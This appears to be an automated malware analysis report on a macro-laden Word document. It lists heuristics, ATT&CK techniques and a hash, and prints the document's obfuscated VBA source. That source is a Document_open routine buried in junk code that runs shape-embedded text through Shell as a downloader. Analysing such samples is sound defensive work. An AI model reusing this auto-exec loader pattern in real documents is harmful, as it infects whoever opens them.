Verdict: MALICIOUS
Risk Score: 232

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample contains a VBA macro that executes a command-line payload. This payload attempts to download and execute a second-stage payload from a list of obfuscated URLs, including 'the embedded link'. The use of Shell() and cmd.exe invocation indicates a downloader functionality. The ClamAV detection further supports its malicious nature.
Heuristics (8)

- ClamAV: Doc.Malware.Dkah-6765041-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dkah-6765041-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script: `WCWnjVrwm = CByte(174538838)` / `izvKr = Array(ROzjt, Interaction.Shell(KuZABNGok, RlljuC), ARTwPT)` / `On Error Resume Next`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script: `Attribute VB_Customizable = True` / `Private Sub Document_open()` / `On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7606 bytes |

SHA-256: 13e8a4b37d74d9cbb4f9f24a014a446064bacf7f94a745cad4b52a25d2ef6766

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 174 of 249 identifiers look randomly generated (e.g. 'VLrJRWKFh'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "LoBBrDLCD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
EKXwn = Atn(kTwOafPUL)
fbrnLohJb = CLng(SuNUQE)
tswpOtwpi = Cos(CnZVMz)
iibTsPdNX = CByte(WpGczWh)
cMIQhtz = CByte(215520608)
fWCrGwT = CBool(251471321)
ddAdVbrU = AXmEQrz
llRAhVLo = 329622686
ViQtnpOtE = CByte(138247519)
On Error Resume Next
tSzHU = Atn(wQwkX)
UHYbdM = CLng(CpOTPRz)
ikiZBzj = Cos(pATjALlf)
TSRVpsIwr = CByte(NfwhpViUj)
KWTnTj = CByte(177534836)
cirEj = CBool(133284092)
zhGorVaJB = IrSiOV
FLozzdCGR = 333768102
MEJvilq = CByte(263330494)
On Error Resume Next
DbGqYrkiX = Atn(kQdctf)
mnzzMvQY = CLng(bIYqwbbI)
MJhiJmCm = Cos(JRbtnSM)
WTzrjpSsQ = CByte(KhOIpVn)
WCHdNwZR = CByte(47579985)
DiVGd = CBool(32227878)
HLzjT = ltKsFP
cGFFw = 66664131
sGAROiKo = CByte(222244731)
Set DJDhK = Shapes("siqTvuBXEodiw")
On Error Resume Next
jYqLSMtBI = Atn(jCiIzd)
qrJtzfqjD = CLng(cLwXD)
lIzGLiwcD = Cos(dFjHYftL)
rEBlt = CByte(bPLQq)
ujJsAB = CByte(147679582)
HsjpQCkD = CBool(311513920)
zSlWMok = EGkSnMN
iZWOXdX = 186156756
wYLVrQXTi = CByte(128566441)
On Error Resume Next
FrMuoNKYJ = Atn(BmbYRfPF)
sdiwirV = CLng(UaDVhHhY)
OJKsjpqNq = Cos(qrqVA)
OzRbtdC = CByte(ZpzGRU)
tzTQFujI = CByte(267824447)
ksnfwdFC = CBool(297336413)
JQzFlG = SurjwWYzr
Fuhhpcn = 59193266
PndLsEYA = CByte(146374863)
On Error Resume Next
FrujqqfzK = Atn(SjZYzQRv)
jBNLQ = CLng(CEwPhFHXF)
MtSPH = Cos(zFVanq)
DfjRTwqs = CByte(imolhkci)
LTRnWw = CByte(208414622)
TEHpq = CBool(65979260)
VukAoo = POfPjbV
NcqPbXSQ = 54350828
lSdmkqnc = CByte(189474446)
On Error Resume Next
jVPBFZEr = Atn(NOCprSfHz)
fzYPALO = CLng(zaMjSt)
abkqz = Cos(dHjKHA)
wqtnhuu = CByte(LFPprKHR)
jvIiQrvR = CByte(333205937)
BpoFs = CBool(74014075)
QGjYwYzY = VUAHFW
AdMsvhzzW = 229353378
stXzWiHu = CByte(2590909)
KuZABNGok = DJDhK.TextFrame.ContainingRange
On Error Resume Next
inVDLsZ = Atn(NDrhAc)
itHXqn = CLng(NRtarJ)
inpIANbs = Cos(qupptn)
FkiXLivUd = CByte(QaDJlBPd)
QBZzOqp = CByte(167433360)
dBwUaW = CBool(265018981)
IlbErUiPw = pKFsZ
OWtjkT = 218489577
EirbmvA = CByte(219247783)
On Error Resume Next
tEkZX = Atn(qncAc)
wFFkbk = CLng(mpzalBI)
jZKno = Cos(XUMocpkV)
csNcNz = CByte(WSvjqPudw)
OzJNSMo = CByte(248413549)
ltvzvpQ = CBool(201076446)
iYYvFkD = sHoIaipFa
LzKfYroO = 18397443
TzrakXv = CByte(172583057)
On Error Resume Next
zAqwE = Atn(rDZvZN)
rGQos = CLng(CljbQGQ)
EnNjKsX = Cos(dKEDb)
wWOOkJ = CByte(tkCcPRVTY)
poqmQLM = CByte(102207609)
fodGkp = CBool(336337482)
oJMBWGcK = KGvbC
ElOOkfjK = 18688265
PdFQiSnPh = CByte(213086486)
On Error Resume Next
ftLLXXPps = Atn(JBzERIA)
nksRNjcMi = CLng(iNCEpw)
idivj = Cos(CLMwju)
XinqjrDO = CByte(iiLtEGia)
MCzni = CByte(116936845)
EUpFA = CBool(238952664)
RtnzZLVwt = zwzkpLvjl
UrnjEVniW = 88198126
juntz = CByte(107934283)
On Error Resume Next
KzMBdXKDU = Atn(FrhpJl)
zHihGats = CLng(pqLXk)
WDNuGdQ = Cos(QotibfVdz)
qXsWKE = CByte(TJdiTrz)
dUicOfK = CByte(233663066)
OsMrS = CBool(84838042)
MqAjNjz = JXnUmPwzw
zKrBk = 215089943
niHRrfAw = CByte(332082509)
Const RlljuC = 0
On Error Resume Next
UAlMzQz = Atn(IQtTqEPT)
PjFRXYQfB = CLng(EAWZvoI)
YpSfcRa = Cos(kzEjUwHQ)
JQEwbUh = CByte(lsjlrwiid)
ickHoqknT = CByte(174003318)
KGtGBl = CBool(156581432)
dwUli = ZqAtzaAqH
nnBcNMo = 11729426
ibmqf = CByte(276113198)
On Error Resume Next
HjzTUrCct = Atn(TzBtJnp)
zVzzJZ = CLng(tdIIjc)
ajqiPFwo = Cos(YzCXBWQwf)
cATqHZXF = CByte(OtUMwoW)
CfYjOI = CByte(202196199)
zGCMWNM = CBool(192758854)
zfHsjErzV = zEnFjiE
QHzOro = 102921237
TVtEA = CByte(218540781)
On Error Resume Next
BLTsML = Atn(rtmiU)
bFbYNEz = CLng(mVsYKXADa)
MAADAX = Cos(idafNTDOV)
wtrAOlYPq = CByte(UCoBoSZ)
TYXEEa = CByte(200268045)
XMYCoKo = CBool(176219411)
JjMzO = oJwdjpZ
utluwYtpR = 146681683
OMqomKNN = CByte(339863587)
On Error Resume Next
VLrJRWKFh = Atn(ZwciJYIT)
marMInz = CLng(IjZmpc)
zQhDtJG = Cos(SEZlstrs)
sCwTdzjW = CByte(ECWIwj)
DhsqEZ = CByte(124657458)
rZHjBFYQ = CBool(278784404)
umfFURwha = DNKGq
oMzCcS = 237244998
cErAUN = CByte(211202394)
On Error Resume Next
mzlUKL = Atn(zvspKdc)
RImrs = CLng(mGFvpP)
LjfTTvd = Cos(itPzERk)
APktD = CByte(lJaJsAtf)
UvsmLNV = CByte(284905535)
wjnOWuoA = CBool(11255060)
EfFWZ = wVsJDdh
UvBLfYniY = 15638061
WCWnjVrwm = CByte(174538838)
izvKr = Array(ROzjt, Interaction.Shell(KuZABNGok, RlljuC), ARTwPT)
On Error Resume Next
nOhftP = Atn(lwsos)
ioLQtMrvs = CLng(XDBoHrWw)
IihGvRS = Cos(HzvjV)
vkDzS = CByte(DBQui)
craBt = CByte(182548384)
QkTwiQzaJ = CBool(239722811)
zACwGEDsE = UGOnbmpbd
FTmEW = 183510141
VjTauRTw = CByte(200440172)
On Error Resume Next
vdmwYczj = Atn(pNkXrHz)
KbJHhIY = CLng(ioimOOE)
aRiAi = Cos(zdiMtaGp)
ucaDO = CByte(YNUNVpn)
uNbJjz = CByte(169605975)
wuXcjdU = CBool(101518886)
UtjoJnKpd = EJnIz
NjzRQX = 293338362
Rifjlqvt = CByte(34908834)
On Error Resume Next
zQzJz = Atn(tHUYCX)
hDvzF = CLng(TnPTo)
PnfXJh = Cos(wwkjDuZMN)
jOEmwqD = CByte(HfrFN)
zJwhfOkK = CByte(277852559)
aLwXs = CBool(35773519)
uFRjEjYT = bRCCDrjCj
vrjzlYYzM = 246355433
jNCzzAvBs = CByte(167338534)
End Sub